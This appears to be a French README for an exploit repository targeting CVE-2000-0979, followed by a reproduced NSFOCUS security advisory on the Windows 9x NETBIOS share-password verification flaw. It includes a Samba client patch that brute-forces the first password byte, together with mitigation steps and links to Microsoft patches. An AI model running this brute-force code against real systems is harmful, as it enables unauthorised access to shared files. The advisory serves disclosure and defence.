
CVE-2000-0979
CVE-2000-0979.rb est l'outil autonome permettant d'exploiter CVE-2000-0979 contre le service SMB de Windows 95.
msf_2000_0979.rb est le module Metasploit. Vous pouvez le copier dans metasploit-framework ▸ modules ▸ auxiliary ▸ scanner ▸ smb

Plus de documentation à venir !
Avis de sécurité NSFOCUS (SA2000-05)
Sujet : Vulnérabilité dans la vérification du mot de passe NETBIOS de Microsoft Windows 9x
Date de publication : 24 août 2000 Date de mise à jour : 11 octobre 2000
Une vulnérabilité existe dans le schéma de vérification du mot de passe utilisé par l'implémentation du protocole NETBIOS de Microsoft Windows 9x. Cette vulnérabilité permet à tout utilisateur d'accéder au service de partage de fichiers Windows 9x protégé par mot de passe. L'attaquant n'a pas besoin de connaître le mot de passe du partage.
Vous pouvez définir un mot de passe pour protéger les ressources partagées du système Microsoft Windows 9x. Mais une vulnérabilité existe dans le schéma de vérification du mot de passe utilisé par l'implémentation du protocole NETBIOS de Microsoft Windows 9x. Pour vérifier le mot de passe, la longueur du mot de passe dépend de la longueur des données envoyées du client au serveur. Autrement dit, si un client définit la longueur du mot de passe sur un octet et envoie le paquet avec le mot de passe en clair au serveur, le serveur ne le comparera qu'avec le premier octet du mot de passe partagé (en clair), et si la comparaison est cohérente, le processus de vérification est terminé. Tout ce qu'un attaquant doit faire est de deviner et d'essayer le premier octet du mot de passe sur la victime. Le système de gestion à distance de Windows 9x est également affecté, car il adopte la même méthode d'authentification par mot de passe partagé.
Voici un exemple simple pour démontrer ce bug. Obtenez le paquet source de samba et modifiez source/client/client.c comme ceci :
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
Fermez le service de partage de fichiers et d'impression Microsoft.
Microsoft a été informé et a publié un bulletin de sécurité concernant cette faille.
Le bulletin est disponible à l'adresse :
http://www.microsoft.com/technet/security/bulletin/MS00-072.asp
Les correctifs sont disponibles pour :
. Microsoft Windows 95
Correctif disponible prochainement
. Microsoft Windows 98 et 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
. Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
LES INFORMATIONS FOURNIES SONT PUBLIÉES PAR NSFOCUS « TELLES QUELLES » SANS GARANTIE D'AUCUNE SORTE. NSFOCUS DÉCLINE TOUTE GARANTIE, EXPRESSE OU IMPLICITE, SAUF LES GARANTIES DE QUALITÉ MARCHANDE. EN AUCUN CAS NSFOCUS NE POURRA ÊTRE TENU RESPONSABLE DE TOUT DOMMAGE, Y COMPRIS LES DOMMAGES DIRECTS, INDIRECTS, ACCESSOIRES, CONSÉCUTIFS, LA PERTE DE BÉNÉFICES COMMERCIAUX OU LES DOMMAGES SPÉCIAUX, MÊME SI NSFOCUS A ÉTÉ INFORMÉ DE LA POSSIBILITÉ DE TELS DOMMAGES. LA DISTRIBUTION OU LA REPRODUCTION DES INFORMATIONS EST AUTORISÉE À CONDITION QUE L'AVIS NE SOIT PAS MODIFIÉ DE QUELQUE MANIÈRE QUE CE SOIT.
© Copyright 1999-2000 NSFOCUS. Tous droits réservés. Conditions d'utilisation.
Équipe de sécurité NSFOCUS [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)